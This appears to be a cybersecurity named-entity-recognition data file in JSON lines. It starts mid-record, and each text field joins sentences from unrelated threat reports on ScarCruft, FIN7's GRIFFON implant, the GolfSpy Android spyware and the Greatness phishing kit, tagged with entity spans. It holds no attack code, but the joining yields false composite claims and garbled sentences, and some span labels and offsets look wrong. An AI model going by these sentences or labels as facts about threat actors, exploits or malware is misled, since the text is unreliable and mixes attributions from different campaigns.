ScarCruft is a relatively new APT group ; victims have been observed in Russia , Nepal , South Korea , China , India , Kuwait and Romania . The FIN7 intrusion set continued its tailored spear phishing campaigns throughout last year . The samples we have observed seemed not to be malware targeted for the game fans but a malware module which accidentally got into [ the ] wrong place .", "spans": [{"start": 59, "end": 68, "label": "Organization"}, {"start": 203, "end": 207, "label": "Organization"}, {"start": 339, "end": 346, "label": "Malware"}, {"start": 360, "end": 373, "label": "Organization"}, {"start": 378, "end": 394, "label": "Malware"}]} {"text": "The data targeted for theft also have similar formats . ScarCruft has several ongoing operations , utilizing multiple exploits \u2014 two for Adobe Flash and one for Microsoft Internet Explorer . Kaspersky Lab has been able to retrieve some of these exchanges from a FIN7 target . But a potential of attackers to misuse such access to infect hundreds of millions of Internet users creates a great risk . \"", "spans": [{"start": 56, "end": 65, "label": "Organization"}, {"start": 137, "end": 148, "label": "System"}, {"start": 161, "end": 188, "label": "System"}, {"start": 191, "end": 204, "label": "Organization"}, {"start": 262, "end": 266, "label": "Organization"}, {"start": 295, "end": 304, "label": "Organization"}]} {"text": "Figure 1 . ScarCruft is a relatively new APT group ; victims have been observed in Russia , Nepal , South Korea , China , India , Kuwait and Romania . The spear phishing campaigns were remarkably sophisticated from a social engineering perspective . 
Digital certificates stolen in some of the heists have been used to sign malware that targeted Tibetan and Uyghur activists .", "spans": [{"start": 11, "end": 20, "label": "Organization"}, {"start": 250, "end": 270, "label": "System"}, {"start": 345, "end": 373, "label": "Organization"}]} {"text": "GolfSpy \u2019 s infection chain GolfSpy 's Potential Impact Given GolfSpy \u2019 s information-stealing capabilities , this malware can effectively hijack an infected Android device . Operation Daybreak appears to have been launched by ScarCruft in March 2016 and employs a previously unknown ( 0-day ) Adobe Flash Player exploit . In various cases , the operators exchanged numerous messages with their victims for weeks before sending their malicious documents . The cryptographic certificates have also been exploited in attacks that have hit companies in the aerospace industry .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 28, "end": 35, "label": "Malware"}, {"start": 62, "end": 69, "label": "Malware"}, {"start": 158, "end": 165, "label": "System"}, {"start": 286, "end": 291, "label": "Vulnerability"}, {"start": 294, "end": 320, "label": "Vulnerability"}, {"start": 456, "end": 486, "label": "System"}, {"start": 554, "end": 572, "label": "Organization"}]} {"text": "Here is a list of information that GolfSpy steals : Device accounts List of applications installed in the device Device \u2019 s current running processes Battery status Bookmarks/Histories of the device \u2019 s default browser Call logs and records Clipboard contents Contacts , including those in VCard format Mobile operator information Files stored on SDcard Device location List of image , audio , and video files stored on the device Storage and memory information Connection information Sensor information SMS messages Pictures GolfSpy also has a function that lets it connect to a remote server to fetch and perform commands Adobe Flash Player exploit . 
The emails were efficient social-engineering attempts that appealed to a vast number of human emotions ( fear , stress , anger , etc. ) to elicit a response from their victims . Attackers frequently abuse stolen certificates to prevent the malware they 're spreading from being detected by various security protections .", "spans": [{"start": 35, "end": 42, "label": "Malware"}, {"start": 526, "end": 533, "label": "Malware"}, {"start": 624, "end": 650, "label": "Vulnerability"}, {"start": 657, "end": 663, "label": "System"}, {"start": 831, "end": 840, "label": "Organization"}]} {"text": ", including : searching for , listing , deleting , and renaming files as well as downloading a file into and retrieving a file from the device ; taking screenshots ; installing other application packages ( APK ) ; recording audio and video ; and updating the malware . It is also possible that ScarCruft deployed another zero day exploit , CVE-2016-0147 , which was patched in April . One of the domains used by the attackers in their 2018 campaign of spear phishing contained more than 130 email aliases , leading us to think that more than 130 companies had been targeted by the end of 2018 . In addition to stealing digital certificates , the Winnti gang 's campaign appears to be motivated by the desire to manipulate in - game currency , such as \" runes \" or \" gold , \" that can in many cases be converted into real currency .", "spans": [{"start": 294, "end": 303, "label": "Organization"}, {"start": 321, "end": 337, "label": "Vulnerability"}, {"start": 340, "end": 353, "label": "Vulnerability"}, {"start": 491, "end": 496, "label": "System"}, {"start": 642, "end": 669, "label": "Organization"}]} {"text": "Technical Analysis The repackaged applications are embedded with malicious code , which can be found in the com.golf package . Operation Erebus leverages another Flash Player exploit ( CVE-2016-4117 ) through the use of watering hole attacks . 
We have seen two types of documents sent to victims in these spear phishing campaigns . The attackers may also want to use source code stolen from the game companies so it can be deployed in rogue servers offering pirated versions of the games .", "spans": [{"start": 108, "end": 116, "label": "Indicator"}, {"start": 162, "end": 182, "label": "Vulnerability"}, {"start": 185, "end": 198, "label": "Vulnerability"}, {"start": 336, "end": 345, "label": "Organization"}]} {"text": "These repackaged apps pose as communication , news , lifestyle , book , and reference apps popularly used in the Middle East . ScarCruft 's Operation Erebus leverages another Flash Player exploit ( CVE-2016-4117 ) through the use of watering hole attacks . The first one exploits the INCLUDEPICTURE feature of Microsoft Word to get context information about the victim\u2019s computer , and the availability and version number of Microsoft Word . Kaspersky has more here .", "spans": [{"start": 127, "end": 136, "label": "Organization"}, {"start": 175, "end": 195, "label": "Vulnerability"}, {"start": 198, "end": 211, "label": "Vulnerability"}, {"start": 284, "end": 298, "label": "System"}, {"start": 310, "end": 319, "label": "Organization"}, {"start": 320, "end": 324, "label": "System"}, {"start": 425, "end": 434, "label": "Organization"}, {"start": 435, "end": 439, "label": "System"}, {"start": 442, "end": 451, "label": "Organization"}]} {"text": "The GolfSpy malware embedded in the apps is hardcoded with an internal name used by the attacker . Nevertheless , resourceful threat actors such as ScarCruft will probably continue to deploy zero-day exploits against their high profile targets . The second one , which in many cases is an Office document protected with a trivial password , such as \u201c 12345 \u201d , \u201c 1234 \u201d , etc. , uses macros to execute a GRIFFON implant on the target\u2019s computer . 
Whether known as commodity malware or \u201c as - a - service , \u201d threat actors have long been turning to their fellow adversaries in the hopes of selling off their tools and opening a new stream of revenue .", "spans": [{"start": 4, "end": 11, "label": "Malware"}, {"start": 148, "end": 157, "label": "Organization"}, {"start": 191, "end": 208, "label": "Vulnerability"}, {"start": 289, "end": 295, "label": "System"}, {"start": 384, "end": 390, "label": "System"}, {"start": 404, "end": 411, "label": "Malware"}, {"start": 464, "end": 481, "label": "Malware"}, {"start": 508, "end": 521, "label": "Organization"}]} {"text": "Figure 2 . After publishing our initial series of blogposts back in 2016 , Kaspersky have continued to track the ScarCruft threat actor . In various cases , the associated macro also scheduled tasks to make GRIFFON persistent . The software is centrally hosted on that third - party company \u2019s servers .", "spans": [{"start": 75, "end": 84, "label": "Organization"}, {"start": 113, "end": 122, "label": "Organization"}, {"start": 172, "end": 177, "label": "System"}, {"start": 207, "end": 214, "label": "Malware"}, {"start": 269, "end": 301, "label": "System"}]} {"text": "Icons of the apps that Bouncing Golf \u2019 s operators repackaged ( top ) and a comparison of packages between the original legitimate app ( bottom left ) and GolfSpy ( bottom right ) Figure 3 . After publishing our initial series of blogposts back in 2016 , we have continued to track the ScarCruft threat actor . Interestingly , following some open-source publications about them , the FIN7 operators seems to have developed a homemade builder of malicious Office document using ideas from ThreadKit , which they employed during the summer of 2018 . 
Think of cloud storage solutions like Dropbox or Plex , for example .", "spans": [{"start": 23, "end": 36, "label": "Malware"}, {"start": 155, "end": 162, "label": "Malware"}, {"start": 384, "end": 388, "label": "Organization"}, {"start": 455, "end": 461, "label": "System"}, {"start": 488, "end": 497, "label": "Malware"}, {"start": 586, "end": 593, "label": "System"}, {"start": 597, "end": 601, "label": "System"}]} {"text": "GolfSpy \u2019 s configurations encoded by a custom algorithm ( right ) and its decoded version ( left ) As shown in Figure 3 , GolfSpy \u2019 s configurations ( e.g. , C & C server , secret keys ) are encoded by a customized algorithm . ScarCruft is a Korean-speaking and allegedly state-sponsored threat actor that usually targets organizations and companies with links to the Korean peninsula . The new builder inserts random values in the Author and Company metadata fields . Threat actors have been using this business model for a decade - plus , originally known as commodity malware .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 123, "end": 130, "label": "Malware"}, {"start": 228, "end": 237, "label": "Organization"}, {"start": 470, "end": 483, "label": "Organization"}, {"start": 562, "end": 579, "label": "Malware"}]} {"text": "After it is launched , GolfSpy will generate a unique ID for the affected device and then collect its data such as SMS , contact list , location , and accounts in this format : \u201c % , [ ] , time \u201d ( shown in Figure 4 ) . The ScarCruft group uses common malware delivery techniques such as spear phishing and Strategic Web Compromises ( SWC ) . Moreover , the builder allows these to modify different IOCs , such as the filenames of wscript.exe or sctasks.exe copies , etc . 
This is when threat actors create a suite of malware tools and offer them up for sale on illicit websites .", "spans": [{"start": 23, "end": 30, "label": "Malware"}, {"start": 224, "end": 239, "label": "Organization"}, {"start": 335, "end": 338, "label": "System"}, {"start": 399, "end": 403, "label": "System"}, {"start": 431, "end": 442, "label": "Indicator"}, {"start": 446, "end": 457, "label": "Indicator"}, {"start": 486, "end": 499, "label": "Organization"}, {"start": 507, "end": 531, "label": "System"}]} {"text": "The information is written into a file on the device . ScarCruft is a Korean-speaking and allegedly state-sponsored threat actor that usually targets organizations and companies with links to the Korean peninsula . The GRIFFON implant is a lightweight JScript validator-style implant without any persistence mechanism . It can range from asking \u201c customers \u201d to pay a monthly fee for access to this set of tools to use in cyber attacks , or users can even pay the original creators to distribute the malware on their behalf and manage the infection .", "spans": [{"start": 55, "end": 64, "label": "Organization"}, {"start": 219, "end": 226, "label": "Malware"}, {"start": 252, "end": 259, "label": "System"}, {"start": 422, "end": 435, "label": "Organization"}]} {"text": "The attacker can choose the data types to collect , which are written in a certain format . ScarCruft uses a multi-stage binary infection scheme . The malware is designed for receiving modules to be executed in-memory and sending the results to C2s . Recently , this model for threat actors has come to be known as the \u201c as - a - service \" model , borrowing the term from the growing trend in the tech industry .", "spans": [{"start": 92, "end": 101, "label": "Organization"}, {"start": 277, "end": 290, "label": "Organization"}]} {"text": "Figure 4 . 
One of the most notable functions of the initial dropper is to bypass Windows UAC ( User Account Control ) in order to execute the next payload with higher privileges . We were able to obtain four different modules during the investigation . Ransomware - as - a - service is a relatively new version of these commodity groups , such as DarkSide , known for the cyber attack in 2021 that disrupted the Colonial oil pipeline and made gas more expensive for thousands of U.S. consumers .", "spans": [{"start": 60, "end": 67, "label": "System"}, {"start": 74, "end": 92, "label": "Malware"}, {"start": 253, "end": 282, "label": "Organization"}, {"start": 347, "end": 355, "label": "Organization"}]} {"text": "Code snippet showing GolfSpy generating UUID The value of % is in the range of 1-9 or a-j . This malware uses the public privilege escalation exploit code CVE-2018-8120 or UACME which is normally used by legitimate red teams . The first module downloaded by the GRIFFON malware to the victim\u2019s computer is an information-gathering JScript , which allows the cybercriminals to understand the context of the infected workstation . 
But other bad actors have since adopted this businesses model , offering every from command and control servers to phishing bots - as - a - service .", "spans": [{"start": 21, "end": 28, "label": "Malware"}, {"start": 155, "end": 168, "label": "Vulnerability"}, {"start": 172, "end": 177, "label": "System"}, {"start": 262, "end": 269, "label": "Malware"}, {"start": 331, "end": 338, "label": "System"}, {"start": 439, "end": 449, "label": "Organization"}, {"start": 513, "end": 540, "label": "System"}, {"start": 544, "end": 576, "label": "Organization"}]} {"text": "Each value represents a different type of data to steal from the device : Value Data Type 1 Accounts 2 Installed APP list 3 Running processes list 4 Battery status 5 Browser bookmarks and histories 6 Call logs 7 Clipboard 8 Contacts 9 Mobile operator information a File list on SD card b Location c Image list d Audio list e Video list f Storage and memory information g Connection information h Sensors information i SMS messages j VCard format contacts Table 1 . Afterwards , the installer malware creates a downloader and a configuration file from its resource and executes it . This module mainly relies on WMI and Windows objects to deliver results , which will be sent back to the operators . There are a few reasons why attackers may opt to pay for an as - a - service malware tool for their chosen campaign : \u2022 As - a - service saves attackers time .", "spans": [{"start": 500, "end": 520, "label": "Malware"}, {"start": 527, "end": 545, "label": "Malware"}, {"start": 611, "end": 614, "label": "System"}, {"start": 619, "end": 626, "label": "System"}, {"start": 727, "end": 736, "label": "Organization"}, {"start": 756, "end": 788, "label": "System"}, {"start": 806, "end": 814, "label": "Organization"}]} {"text": "The type of data corresponding to the value coded in GolfSpy Figure 5 shows the code snippets that are involved in monitoring and recording the device \u2019 s phone call . 
The downloader malware uses the configuration file and connects to the C2 server to fetch the next payload . Interestingly , more than 20 artifacts are retrieved from the system by this implant during the reconnaissance stage , from the date and time of operating system installation and membership in a Windows domain to a list of and the resolutions of the workstation\u2019s monitors . When they pay for someone else \u2019s malware kit , whether it be ransomware or a phishing bot , they do n\u2019t have to invest time , money or labor to write their own malicious code or tools and instead can hop right into deploying the malware .", "spans": [{"start": 53, "end": 60, "label": "Malware"}, {"start": 172, "end": 190, "label": "System"}, {"start": 191, "end": 218, "label": "Malware"}, {"start": 223, "end": 248, "label": "Malware"}, {"start": 472, "end": 479, "label": "System"}]} {"text": "It will also take a photo using the device \u2019 s front camera when the user wakes the device . The ScarCruft group keeps expanding its exfiltration targets to steal further information from infected hosts and continues to create tools for additional data exfiltration . The second module is used by the operators to execute an obfuscated PowerShell script , which contains a Meterpreter downloader widely known as \u201c Tinymet \u201c . For the actors and groups who originally created the malware , it is a more reliable income stream for them .", "spans": [{"start": 97, "end": 106, "label": "Organization"}, {"start": 336, "end": 346, "label": "System"}, {"start": 373, "end": 384, "label": "System"}, {"start": 385, "end": 395, "label": "System"}, {"start": 414, "end": 421, "label": "System"}, {"start": 434, "end": 440, "label": "Organization"}]} {"text": "Apart from collecting the above data , the spyware monitors users \u2019 phone calls , records them , and saves the recorded file on the device . 
We also discovered an interesting piece of rare malware created by this threat actor \u2013 a Bluetooth device harvester . This downloader , seen in past FIN7 campaigns , downloads a one-byte XOR encrypted ( eg. with the key equal to 0x50 or 0x51 ) piece of meterpreter shellcode to execute . Usually , they \u2019d have to hope a successful attack leads to a ransom payment or some sort of other financial windfall .", "spans": [{"start": 189, "end": 196, "label": "System"}, {"start": 230, "end": 256, "label": "Malware"}, {"start": 264, "end": 274, "label": "System"}, {"start": 290, "end": 294, "label": "Organization"}, {"start": 394, "end": 405, "label": "System"}]} {"text": "GolfSpy encrypts all the stolen data using a simple XOR operation with a pre-configured key before sending it to the C & C server using the HTTP POST method . We believe they may have some links to North Korea , which may explain why ScarCruft decided to closely monitor them . The third module allows the operators to take a screenshot of the remote system . Instead , they can make money by marketing their services to other bad actors for a fee .", "spans": [{"start": 0, "end": 7, "label": "Malware"}]} {"text": "Figure 5 . ScarCruft also attacked a diplomatic agency in Hong Kong , and another diplomatic agency in North Korea . To do that , it also drops a PowerShell script on the workstation to execute . 
\u2022 Bad actors who want to get into the cyber attack business need little to no technical skills to get started .", "spans": [{"start": 37, "end": 54, "label": "Organization"}, {"start": 82, "end": 99, "label": "Organization"}, {"start": 146, "end": 156, "label": "System"}, {"start": 198, "end": 208, "label": "Organization"}]} {"text": "Code snippets showing how GolfSpy monitors phone calls via register receiver ( top left ) , its actions when the device is woken up ( top right ) , and how it encrypts the stolen data ( bottom ) The malware retrieves commands from the C & C server via HTTP , and attackers can steal specific files on the infected device . It appears ScarCruft is primarily targeting intelligence for political and diplomatic purposes . The script executes an open-source .NET class used for taking a screenshot . When an attacker pays for an as - a - service malware , they often get an individual login with dedicated customer support , much like any user would with a legitimate piece of software .", "spans": [{"start": 26, "end": 33, "label": "Malware"}, {"start": 334, "end": 343, "label": "Organization"}, {"start": 367, "end": 379, "label": "Organization"}, {"start": 384, "end": 393, "label": "Organization"}, {"start": 398, "end": 408, "label": "Organization"}, {"start": 455, "end": 459, "label": "Indicator"}, {"start": 505, "end": 513, "label": "Organization"}, {"start": 526, "end": 550, "label": "Malware"}]} {"text": "The command is a constructed string split into three parts using \" \" as a separator . ScarCruft infected this victim on September 21 , 2018 . The resulting screenshot is saved at \u201c %TMP%/image.png \u201d , sent back to the attackers by the GRIFFON implant and then deleted . 
As Nick Biasini explained in a past episode of Talos Takes , name recognition also plays a major part in the rising popularity of this business model .", "spans": [{"start": 86, "end": 95, "label": "Organization"}, {"start": 181, "end": 196, "label": "Indicator"}, {"start": 235, "end": 242, "label": "Malware"}, {"start": 273, "end": 285, "label": "Organization"}, {"start": 317, "end": 328, "label": "Organization"}]} {"text": "The first part is the target directory , the second is a regular expression used to match specific files , while the last part is an ID . But before the ScarCruft infection , however , another APT group also targeted this victim with the host being infected with GreezeBackdoor on March 26 , 2018 . The last retrieved module is a persistence module . Lesser - known threat actors want to piggyback off having a big name associated with them , like DarkSide , to intimidate their actors or lend more credence to the effectiveness of their threats .", "spans": [{"start": 153, "end": 162, "label": "Organization"}, {"start": 351, "end": 379, "label": "Organization"}, {"start": 448, "end": 456, "label": "Malware"}]} {"text": "Figure 6 . ScarCruft has a keen interest in North Korean affairs , attacking those in the business sector who may have any connection to North Korea , as well as diplomatic agencies around the globe . If the victim appears valuable to the attackers , a GRIFFON implant installer is pushed to the victim\u2019s workstation . 
Cisco Talos researchers recently discovered Greatness , one of the most advanced phishing - as - a - service tools ever seen in the wild .", "spans": [{"start": 11, "end": 20, "label": "Organization"}, {"start": 90, "end": 105, "label": "Organization"}, {"start": 162, "end": 181, "label": "Organization"}, {"start": 253, "end": 260, "label": "Malware"}, {"start": 269, "end": 278, "label": "System"}, {"start": 319, "end": 342, "label": "Organization"}, {"start": 363, "end": 372, "label": "System"}, {"start": 400, "end": 433, "label": "Organization"}]} {"text": "Example of a command that steals specific files from an infected device \u2019 s application ( top ) , and GolfSpy \u2019 s parse-and-perform command ( bottom ) Apart from the HTTP POST method , GolfSpy also creates a socket connection to the remote C & C server in order to receive and perform additional commands . Earlier this month , we caught another zero-day Adobe Flash Player exploit deployed in targeted attacks . This module stores another instance of the GRIFFON implant inside the registry to achieve persistence . Our analysis indicates that attackers may have been using attackers since mid-2022 .", "spans": [{"start": 102, "end": 109, "label": "Malware"}, {"start": 185, "end": 192, "label": "Malware"}, {"start": 346, "end": 381, "label": "Vulnerability"}, {"start": 456, "end": 463, "label": "Malware"}, {"start": 545, "end": 554, "label": "Organization"}]} {"text": "Stolen data will also be encrypted and sent to the C & C server via the socket connection . ScarCruft is a relatively new APT group ; victims have been observed in several countries , including Russia , Nepal , South Korea , China , India , Kuwait and Romania . Here is a PowerLinks style method used by the attackers to achieve persistence and execute the GRIFFON implant at each user logon . 
Greatness offers the ability for users to bypass targets \u2019 multi - factor authentication protections , IP filtering and integration with Telegram bots .", "spans": [{"start": 92, "end": 101, "label": "Organization"}, {"start": 272, "end": 282, "label": "System"}, {"start": 357, "end": 364, "label": "Malware"}, {"start": 394, "end": 403, "label": "System"}]} {"text": "The encryption key is different from the one used for sending stolen data via HTTP . Currently , the group is engaged in two major operations : Operation Daybreak and Operation Erebus . The new GRIFFON implant is written to the hard drive before each execution , limiting the \u201c file-less \u201d aspect of this method . Greatness incorporates features seen in some of the most advanced PaaS offerings , such as multi - factor authentication ( MFA ) bypass , IP filtering and integration with Telegram bots .", "spans": [{"start": 194, "end": 201, "label": "Malware"}, {"start": 314, "end": 323, "label": "System"}, {"start": 452, "end": 464, "label": "System"}, {"start": 486, "end": 499, "label": "System"}]} {"text": "Figure 7 . The other one , ScarCruft 's Operation Erebus employs an older exploit , for CVE-2016-4117 and leverages watering holes . Through its light weight and modular architecture , the GRIFFON implant is the perfect validator . 
Greatness , for now , is only focused on Microsoft 365 phishing pages , providing its affiliates with an attachment and link builder that creates highly convincing decoy and login pages .", "spans": [{"start": 88, "end": 101, "label": "Vulnerability"}, {"start": 189, "end": 196, "label": "Malware"}, {"start": 232, "end": 241, "label": "Organization"}, {"start": 273, "end": 301, "label": "Organization"}]} {"text": "The additional commands that attackers can carry out via a socket connection ( top ) and the key used to encrypt the stolen data ( bottom ) Correlating Bouncing Golf 's Activities We monitored Bouncing Golf \u2019 s C & C-related activities and saw that the campaign has affected more than 660 devices as of this writing . The other one , \" Operation Erebus \" employs an older exploit , for CVE-2016-4117 and leverages watering holes . Even though we have been able to retrieve four different modules , it is possible that the FIN7 operators have more modules in their toolsets for achieving their objectives on the victim\u2019s workstation . It contains features such as having the victim \u2019s email address pre - filled and displaying their appropriate company logo and background image , extracted from the target organization \u2019s real Microsoft 365 login page .", "spans": [{"start": 152, "end": 165, "label": "Malware"}, {"start": 193, "end": 206, "label": "Malware"}, {"start": 386, "end": 399, "label": "Vulnerability"}, {"start": 522, "end": 526, "label": "Organization"}]} {"text": "The small or limited number is understandable given the nature of this campaign , but we also expect it to increase or even diversify in terms of distribution . We will publish more details about the attack once Adobe patches the vulnerability , which should be on June 16 . Attackers make mistakes , and FIN7 are no exception . 
This makes Greatness particularly well - suited for phishing business users .", "spans": [{"start": 305, "end": 309, "label": "Organization"}, {"start": 340, "end": 349, "label": "Organization"}, {"start": 381, "end": 404, "label": "Organization"}]} {"text": "Most of the affected devices were located in the Middle East , and many of the stolen data we saw is military-related ( e.g. , images , documents ) . The ScarCruft APT gang has made use of a Flash zero day patched Thursday by Adobe to attack more than two dozen high-profile targets in Russia and Asia primarily . The major error made by its operators allowed us to follow the command and control server of the GRIFFON implant last year . Any Greatness affiliates do n\u2019t need a specific set of skills .", "spans": [{"start": 191, "end": 205, "label": "Vulnerability"}, {"start": 411, "end": 418, "label": "Malware"}, {"start": 443, "end": 452, "label": "Organization"}]} {"text": "Bouncing Golf \u2019 s operators also try to cover their tracks . Adobe on Thursday patched a zero-day vulnerability in Flash Player that has been used in targeted attacks carried out by a new APT group operating primarily against high-profile victims in Russia and Asia . In order to trick blue teams and other DFIR analysts , the operators created fake HTTP 302 redirection to various Google services on their C2s servers . All they need to do is deploy and configure the provided phishing kit with an API key .", "spans": [{"start": 0, "end": 13, "label": "Malware"}, {"start": 89, "end": 111, "label": "Vulnerability"}, {"start": 307, "end": 311, "label": "System"}, {"start": 350, "end": 354, "label": "Indicator"}, {"start": 382, "end": 388, "label": "Organization"}]} {"text": "The registrant contact details of the C & C domains used in the campaign , for instance , were masked . 
Researchers at Kaspersky Lab privately disclosed the flaw to Adobe after exploits against the zero-day were used in March by the ScarCruft APT gang in what Kaspersky Lab is calling Operation Daybreak . This error allowed us to follow the infrastructure week by week , until an individual pushed on Twitter the heuristic to track their C2 at the end of December 2018 . If used successfully , the attacker can set up a proxy Microsoft 365 authentication system and steal a victim \u2019s authentication credentials or cookies with a \u201c man - in - the - middle \" attack .", "spans": [{"start": 119, "end": 132, "label": "Organization"}, {"start": 198, "end": 206, "label": "Vulnerability"}, {"start": 260, "end": 273, "label": "Organization"}, {"start": 402, "end": 409, "label": "Organization"}, {"start": 439, "end": 441, "label": "System"}, {"start": 495, "end": 507, "label": "Organization"}]} {"text": "The C & C server IP addresses used also appear to be disparate , as they were located in many European countries like Russia , France , Holland , and Germany . Kaspersky speculates that ScarCruft could also be behind another zero-day , CVE-2016-0147 , a vulnerability in Microsoft XML Core Services that was patched in April . A few days after the tweet , in January 2019 , the operators changed their landing page in order to prevent this type of tracking against their infrastructure . 
Greatness is specifically designed to work in a standardized way so that the experience is the same for each customer who buys into the service , potentially allowing anyone with a moderate amount of technical ability to carry out advanced , convincing phishing attacks .", "spans": [{"start": 160, "end": 169, "label": "Organization"}, {"start": 186, "end": 195, "label": "Organization"}, {"start": 225, "end": 233, "label": "Vulnerability"}, {"start": 236, "end": 249, "label": "Vulnerability"}, {"start": 488, "end": 497, "label": "Organization"}, {"start": 719, "end": 757, "label": "Organization"}]} {"text": "It \u2019 s not a definite correlation , but Bouncing Golf also seems to have a connection with Domestic Kitten due to similarities we found in their code . Attacks start with spear-phishing emails that include a link to a website hosting an exploit kit associated with ScarCruft and used in other attacks . During the investigation related to the GRIFFON infrastructure , we found a strange overlap between the WHOIS record of an old GRIFFON C2 and the website of a fake company . Since as - a - service or commodity malware can include all types of malware , it can be tough to provide specific advice for detection and prevention .", "spans": [{"start": 40, "end": 53, "label": "Malware"}, {"start": 91, "end": 106, "label": "Malware"}, {"start": 265, "end": 274, "label": "Organization"}, {"start": 343, "end": 350, "label": "Malware"}, {"start": 407, "end": 412, "label": "System"}, {"start": 430, "end": 437, "label": "Malware"}, {"start": 438, "end": 440, "label": "System"}, {"start": 503, "end": 520, "label": "Malware"}]} {"text": "For example , the Android malware that both deploy share the same strings of code for their decoding algorithm . Another set of attacks called Operation Erebus leverages another Flash exploit , CVE-2016-4117 , and relies on watering hole attacks as a means of propagation . 
According to the website , that domain supposedly belongs to a legitimate security company \u201c fully owned by the Russian Government \u201d ( sic . ) and having offices in \u201c Moscow , Saint Petersburg and Yekaterinburg \u201d , but the address says the company is located in Trump Tower , in New York . For Greatness specifically , anyone implementing multi - factor authentication should opt for code - based authentication through their MFA app of choice , such as Cisco Duo , rather than the easier - to - break method of a simple \u201c yes \u201d or \u201c no \u201d push notification .", "spans": [{"start": 18, "end": 25, "label": "System"}, {"start": 178, "end": 191, "label": "Vulnerability"}, {"start": 194, "end": 207, "label": "Vulnerability"}, {"start": 386, "end": 404, "label": "Organization"}, {"start": 536, "end": 547, "label": "Organization"}, {"start": 568, "end": 577, "label": "Organization"}, {"start": 728, "end": 737, "label": "System"}]} {"text": "The data that Domestic Kitten steals follows a similar format with Bouncing Golf \u2019 s , with each type of data having a unique identifying character . Thursday 's Flash Player update patched 36 vulnerabilities in total including the zero day CVE-2016-4171 . Given FIN7 \u2019s previous use of false security companies , we decided to look deeper into this one . Adversaries may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": [{"start": 14, "end": 29, "label": "Malware"}, {"start": 67, "end": 80, "label": "Malware"}, {"start": 232, "end": 240, "label": "Vulnerability"}, {"start": 241, "end": 254, "label": "Vulnerability"}, {"start": 263, "end": 267, "label": "Organization"}, {"start": 356, "end": 367, "label": "Organization"}]} {"text": "It \u2019 s also worth noting that both campaigns repackage apps that are commonly used in their target \u2019 s countries , such as Telegram , Kik , and Plus messaging apps . 
The ongoing operation likely began as early as January 2017 and has continued through the first quarter of 2019 . As we were looking at the content of the website , it became evident that almost all of the text used was lifted from legitimate security-company websites . Operating systems may have features to hide various artifacts , such as important system files and administrative task execution , to avoid disrupting user work environments and prevent users from changing files or features on the system .", "spans": [{"start": 123, "end": 131, "label": "System"}, {"start": 134, "end": 137, "label": "System"}, {"start": 144, "end": 148, "label": "System"}, {"start": 437, "end": 454, "label": "System"}, {"start": 519, "end": 531, "label": "System"}]} {"text": "Figure 8 . Cisco Talos assess with high confidence that these operations are distinctly different and independent from the operations performed by DNSpionage , which we reported on in November 2018 . Phrases and sentences were borrowed from at least the following companies/sites : DKSec \u2013 www.dksec.com , OKIOK \u2013 www.okiok.com/services/tailored-solutions , MainNerve \u2013 www.mainnerve.com , Datics \u2013 www.datatics.com/cyber-security , Perspective Risk \u2013 www.perspectiverisk.com , Synack \u2013 https://www.synack.com/company , FireEye \u2013 https://www.fireeye.com/services/penetration-testing.html . 
Adversaries may abuse these features to hide artifacts such as files , directories , user accounts , or other system activity to evade detection.[1][2][3 ]", "spans": [{"start": 11, "end": 22, "label": "Organization"}, {"start": 282, "end": 287, "label": "Organization"}, {"start": 290, "end": 303, "label": "Indicator"}, {"start": 306, "end": 311, "label": "Organization"}, {"start": 314, "end": 355, "label": "Indicator"}, {"start": 358, "end": 367, "label": "Organization"}, {"start": 370, "end": 387, "label": "Indicator"}, {"start": 390, "end": 396, "label": "Organization"}, {"start": 399, "end": 430, "label": "Indicator"}, {"start": 433, "end": 449, "label": "Organization"}, {"start": 452, "end": 475, "label": "Indicator"}, {"start": 478, "end": 484, "label": "Organization"}, {"start": 487, "end": 517, "label": "Indicator"}, {"start": 520, "end": 527, "label": "Organization"}, {"start": 530, "end": 587, "label": "Indicator"}, {"start": 590, "end": 601, "label": "Organization"}]} {"text": "Code snippets showing : the decoding algorithm shared by both Bouncing Golf and Domestic Kitten ( top ) , the format of data that Domestic Kitten \u2019 s malware targets to steal ( center ) , and how both Bouncing Golf ( bottom left ) and Domestic Kitten ( bottom right ) use \" \" as a separator in their command strings . We assess with high confidence that these operations are distinctly different and independent from the operations performed by DNSpionage , which we reported on in November 2018 . This company seems to have been used by the FIN7 threat actor to hire new people as translators , developers and pentesters . 
Adversaries may also attempt to hide artifacts associated with malicious behavior by creating computing regions that are isolated from common security instrumentation , such as through the use of virtualization technology.[4 ] Bundlore uses the mktemp utility to make unique file and directory names for payloads , such as TMP_DIR=`mktemp", "spans": [{"start": 62, "end": 75, "label": "Malware"}, {"start": 80, "end": 95, "label": "Malware"}, {"start": 130, "end": 145, "label": "Malware"}, {"start": 201, "end": 214, "label": "Malware"}, {"start": 235, "end": 250, "label": "Malware"}, {"start": 542, "end": 546, "label": "Organization"}, {"start": 624, "end": 635, "label": "Organization"}, {"start": 851, "end": 859, "label": "Malware"}, {"start": 869, "end": 883, "label": "System"}]} {"text": "As we \u2019 ve seen in last year \u2019 s mobile threat landscape , we expect more cyberespionage campaigns targeting the mobile platform given its ubiquity , employing tried-and-tested techniques to lure unwitting users . The common use of the Enfal Trojan suggests that Shadow Network may be exchanging tools and techniques . During our research , we found various job advertisements associated with the company on freelance and remote-work websites . DarkTortilla has used % HiddenReg%", "spans": [{"start": 236, "end": 248, "label": "System"}, {"start": 445, "end": 457, "label": "Malware"}]} {"text": "The extent of information that these kinds of threats can steal is also significant , as it lets attackers virtually take over a compromised device . While Silence had previously targeted Russian banks , Group-IB experts also have discovered evidence of the group 's activity in more than 25 countries worldwide . While tracking numerous threat actors on a daily basis during the final days of 2018 and at the beginning of 2019 , we discovered various activity clusters sharing certain TTPs associated with the FIN7 intrusion set . 
